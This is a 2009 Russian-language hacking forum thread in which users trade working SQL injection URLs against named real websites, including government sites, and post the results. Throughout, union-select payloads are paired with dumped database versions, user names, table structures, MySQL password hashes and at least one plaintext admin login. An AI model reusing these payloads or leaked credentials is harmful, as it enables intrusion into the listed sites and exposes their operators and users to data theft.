http://www.barretos.sp.gov.br/link.php?xvar=visualizar_noticia.php&xid=2775+union+select+1,concat(version(),0x3a,data base(),0x3a,user()),3,4,concat(user,0x3a,password) ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28+from+mysql.user/*
root:*F198BE3CAC3D18166686B06616A7AF91F12C216B
debian-sys-maint:*6CAC5B20416E98730147E916FA95DC269C642096
prefeitura:*BBC9CA993C596C217D96B21D23D4C158D99025 21
moodle:*AFF9BCF11C745F9D5B71243B22B436F452094DE2
-m0rgan-
09.03.2009, 12:53
http://www.f1ticket.info/pages.php?ID=-1+union+all+select+0,convert(concat_ws(version(),u ser(),database())+using+latin1),2,3,4,5,6,7--
юзер/версия/бд:
f1ticket@localhost4.1.11-Debian_4sarge2-logf1ticket
Evgesha23
09.03.2009, 16:33
http://www.toris.ru
http://www.toris.ru/?d=helper&id=-1+union+select+null,concat_ws(ver sion(),us er(),data base()),3--
u24236@10.10.10.2215.0.67-logu24236
-m0rgan-
09.03.2009, 17:02
http://www.atmtravel.com.au/productinfo.php?id=-1+union+all+select+0,1,2,3,4,5,concat_ws(version() ,user(),database()),7,8,9,10,11,12,13,14,15,16,17, 18--
юзер/версия/бд:
atm@localhost5.0.24atmweb
все таблицы:
http://www.atmtravel.com.au/productinfo.php?id=-1+union+all+select+0,1,2,3,group_concat(table_name ),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+inform ation_schema.tables--
колонки из таблици admin:
http://www.atmtravel.com.au/productinfo.php?id=-1+union+all+select+0,1,2,3,group_concat(column_nam e),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+infor mation_schema.columns+where+table_name='admin'--
но увы при попытке вывода из колонок получаю ошибку :(
возможно что то туплю, возможно прав не хватает :(
***добавлено***
вывод:
http://www.atmtravel.com.au/productinfo.php?id=-1+union+all+select+0,1,2,3,concat_ws(0x3a,admin_id ,admin_name,admin_email,admin_pass,admin_level),5, 6,7,8,9,10,11,12,13,14,15,16,17,18+from+test.admin
это я протупил!
Спасибо R1dex!
-----------------------------------------------
The End!
http://www.topcasinos.es/juego/bingo.php?id=33+and+1=0+union+select+1,version(),3 ,4/*
там их точно 4.
спасибо R1dex
S0ulVortex
09.03.2009, 18:25
www.pswdoptimists.org
http://www.pswdoptimists.org/news.php?ax=v&n=1&id=10&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--
Version: 5.0.67-community
User: pswdopti_admin@localhost
Database: pswdopti_cms
http://www.supervolos.ru/index1.php?option=news&page=1&id=-1+union+select+concat_ ws(0x3a ,version(),database(),user()),2,3--
Database Version : 5.0.54
Database name : z262240_svolos
User name : z262240_igoruser@localhost
----------------------------------------------------+
http://www.taraplast.com.ua/articleview.php?id=-1+union+select+1,concat_ws(0x3a,ve rsion(),data base(),user()),3,4,5,6,7,8,9,10--
Database Version : 5.0.45-log
Database name : taraplas_main
User name : taraplas_user@localhost
какой-то один юзверь, скорее всего админ:
http://www.taraplast.com.ua/articleview.php?id=-1+union+select+1,concat_ws(0x3a,login,pass word),3,4,5,6,7,8,9,10+from+login+li mit+0,1--
mythical:mistake
M.W.N.N.
09.03.2009, 20:26
http://www.ccst.gov.cn/newsView.php?cid=16&id=2999+UNION+SELECT+1,2,3,version(),5,6,7,8,9,10, 11,12,13+FROM+users+LIMIT+1,1/*
Version():4.0.17-standard
Database():ccst2006
User():root@localhost
http://www.ccst.gov.cn/newsView.php?cid=16&id=2999+UNION+SELECT+1,concat(uid,0x3a,username,0x 3a,password),3,concat(version(),0x3a,database(),0x 3a,user()),5,6,7,8,9,10,11,12,13+FROM+users+LIMIT+ 1,1/*
4:xuguoxin:5668744b4e9be33ea7f34f2534e41455
http://www.ccst.gov.cn/newsView.php?cid=16&id=2999+UNION+SELECT+1,concat(user,0x3a,password), 3,4,5,6,7,8,9,10,11,12,13+FROM+mysql.user+LIMIT+1, 1/*
root:67457e226a1a15bd
http://www.burnopfieldcc.com/display.php?pageid=5/**/UNION/**/SELECT/**/1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21/*
Database Version: 4.1.22
Database name: burnopfieldcc_com_-_database
User name: burnopfield@localhost
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot